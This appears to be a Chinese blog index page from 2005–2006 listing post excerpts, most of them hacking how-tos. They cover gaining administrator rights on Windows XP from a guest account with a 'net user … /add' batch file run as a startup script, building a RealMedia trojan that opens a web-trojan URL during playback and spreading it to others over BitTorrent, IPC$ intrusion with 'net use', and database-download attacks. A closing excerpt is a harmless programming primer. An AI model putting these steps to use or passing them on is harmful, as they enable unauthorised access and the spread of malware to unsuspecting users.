博文

xp中用guest用户提升权限(2006-05-07 12:43:00)

摘要: 在WINDOWS XP 中有一种比较简便的方法可以用GUEST用户新建系统管理员级别帐户。方法如下:1.新建一个文本文件,如文件名为a.txt,输入内容: net user new 110  /add  net localgroup administrators new/add 将上面的文本文件保存为批处理文件,即把文件名后缀改为.bat,保存 然后以guest用户登陆系统,打开组策略编辑窗口,在“计算机配置”---“启动”属性窗口添加启动文件,把刚才那个建立好的文件添加进去,保存,然后重启电脑,就可以以用户new 密码110登陆系统了,这样就拥有了管理员权限了。
......

阅读全文(7330) | 评论:5

rm木马制作(2006-05-07 02:35:00)

摘要:1 做RM木马主要是利用RM影音文件来连接网页的马, 所以做RM木马前我们先做好网页木马.
2 将网页木马上传到空间
3 打开Helix Producer Plus 9 下面的
 rmedtgui.exe做RM木马,
4 写一个文本文件起名叫 1.txt

u 00:10.0 01:10.0 http://xxxxxxxxx(你的马的网页地址)

u 01:10.0 01:10.0 http://xxxxxxxx
这里表示的是文件播放10秒和1分10秒的时候自动打开http://xxxxxxxxx

5

file菜单Open打开一个Rm文件,从菜单栏的tools中选择Merge Events,在弹出的对话框中选择

1.txt文件,确定后Rmedtgui开始合并,保存

6 然后就可以传给别人,或者做个bt种子什么的发布出去就好了

......

阅读全文(4031) | 评论:3

IPC$入侵(2006-05-05 19:55:00)

摘要:在黑客众多的入侵手段中,通过IPC$入侵已成为目前比较常见的一种方式,其攻击步骤甚至可以说已经成为经典的入侵模式,许多朋友非常想搞清楚这是怎么回事。知己知彼,方能百战不殆,基于这种考虑,我们来介绍一下这种入侵方式的基础知识。 IPC 是Internet Process Connection的缩写,也就是远程网络连接。它是Windows NT/2000/XP特有的一项功能,就是在两个计算机进程之间建立通信连接。打个比方,IPC连接就像是挖好的地道,程序可通过地道访问远程主机。默认情况下,IPC是共享的,也就是说微软已经为我们挖好了这个地道(IPC),因此,这种基于IPC的入侵也常常被简称为IPC入侵。 IPC 后面的$是共享的意思,不过是隐藏的共享,微软系统中用“$”表示隐藏的共享,比如C$就是隐藏的共享C盘。也就是说C盘是共享的,但是C盘没有那个“托手”标志。IPC$是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码!当然对方机器必须打开IPC$共享,否则你是连接不上的。而利用这个空的连接,连接者还可以得到目标主机上的用户列表。 问:建立IPC连接需要什么条件? 答:建立IPC连接要求双方都是基于NT架构的系统。Windows Me/98/95都不可以。 问:怎么才能建立IPC连接呢?需要什么黑客工具呢? 答:建立IPC连接不需要任何黑客工具,在Windows里敲命令行就行了,但需要知道远程主机的用户名和密码。打开CMD后用如下命令:net use\\ip\ipc$ "password" /user:"username"进行连接。注意,如果远程服务器没有监听139或445端口,会话是无法建立的。也就是说IPC$需要对方开启139或 445端口。 问:建立IPC$之后黑客能做什么? 答:如果黑客使用管理员权限的账号和目标连接IPC $,他就可以和对方系统做深入“交流”了。黑客可以使用各种命令行方式的工具,比如pstools系列、Win2000SrvReskit、 telnethack等获得目标信息、管理目标的进程和服务等。如果目标开放了默认共享(没开的话,黑客会帮你开),黑客就可以上传木马并运行,也......

阅读全文(3044) | 评论:0

数据库下载攻防大全(2006-04-04 23:10:00)

摘要:现在总结如下有效方法:     1. 修改数据库名。这是常用方法,将数据库名该成怪异名字或长名字,以防别人猜测。一旦被人猜到,别人还是能下载数据库文件,但几率不大。如将数据库database.mdb改成dslfjds$^&ijjkgf.mdb等      2. 修改数据库后缀。一般改成database.asp 、database.asa、 database.inc、 database.cgi、 database.dll等等,注意要在IIS中设置这些后缀的文件不能被解析。       3. 将数据库database.mdb改成#database.mdb 。 这是最简单有效的办法。      分析:假设别人得到你的数据库地址串将是:   http://www.yourserver.com/yourfolder/#database.mdb       但实际上他得到是:http://www.yourserver.com/yourfolder/       因为#在这里起到间断符的作用,地址串遇到#号,自动认为访问地址串结束。注意:不要设置目录可访问。用这种方法,不管别人用何种工具都无法下载,如flashget,网络蚂蚁等。       注:只要数据库文件名任何地方含有'#',别人都无法正常下载。同理,空格号也可以起到'#'号作用,但必须是文件名中间出现空格。       4. 将数据库连接文件放到其他虚拟目录下。       5. 将 Access数据库加密。       以上只列出常用之法,为增加保险性,可以几种方法同时使用。 数据库下载漏洞攻击技术   下载漏洞,现在已经被越来越多的人所熟知。在这个信息化技术更新飞快的时代,漏洞产生后随之而来的就是各种应对的招数,比如改数据库的后缀、修改数据库的名字等等。很多人以为只要这么做就可以解决问题了,但事实往往不如你我所愿,即使你这么做了也难逃被高手攻击的命运。为此我们有必要去了解一些攻击的手法,来增强自己的安全技能。   1.强制下载后缀名为ASP、ASA的数据库文件   大多数的网管为了节省时间,网站上的文章系统、论坛等......

阅读全文(3472) | 评论:0

黑客一点知识(2005-09-18 01:32:00)

摘要: 上面的题目带有“黑客”两个字,请大家别误会了,其实没有多少是讲黑客的,这完全是一篇菜鸟级的编程杂谈,如果您已是高手,就不必在此浪费时间了 。
  前几天在网上看了“病毒”兄写的《WIN下编程须知》一文,觉得在编程方面要写出一篇适合初学者们看的入门级文章的确很重要,可惜病毒兄只在该文里介绍了线程、消息、句柄等几个基本概念。很多初学者看了对编程还是感到很迷惑,一个从来没有写过程序的人如何入门?如何在短时间内写出自己的程序来?笔者带着这些问题写了这篇文章。这也是笔者在学习编程的初期所遇到的困惑,在此根据笔者的个人理解将其整理成文,希望能引起广大菜鸟们的共鸣,对初学者们有所帮助。
  从理论上说,任何一门语言都可以在任何一个系统上编程,只要找到该系统提供的“接口”和对系统内部机制有深入的了解就可以了,至少我是这么认为的。正如c语言可以在windows下编程,也同样可以在Linux上大放异彩一样。
  编程是一项很繁杂的工作,除了应用编程工具之外,了解系统本身内部工作机理非常重要,这是你写出稳定兼容的程序所必不可少的前提条件。你要在哪一种系统上编程就要对该系统的机制进行研究,至少你应该知道一个程序在那个系统上是如何运行的。
  一、了解Windows 内部机制
  Windows 是一个“基于事件的,消息驱动的”操作系统。
  在Windows下执行一个程序,只要用户进行了影响窗口的动作(如改变窗口大小或移动、单击鼠标等)该动作就会触发一个相应的“事件”。系统每次检测到一个事件时,就会给程序发送一个“消息”,从而使程序可以处理该事件。每个Windows 应用程序都是基于事件和消息的,而且包含一个主事件循环,它不停地、反复地检测是否有用户事件发生。每次检测到一个用户事件,程序就对该事件做出响应,处理完再等待下一个事件的发生。
  Windows 下的应用程序不断地重复这一过程,直至用户终止程序,用代码来描述实际上也就是一个消息处理过程的while循环语句。
  下面便简单介绍一下与 Windows 系统密切相关的几个基本概念:

  ⒈窗口:这是我要说的第一个概念。似乎是地球人都知道的事儿了,窗口是Windows本身以及Windows 环境下的应用程序的基本界面单位,但是很多人......

阅读全文(6106) | 评论:4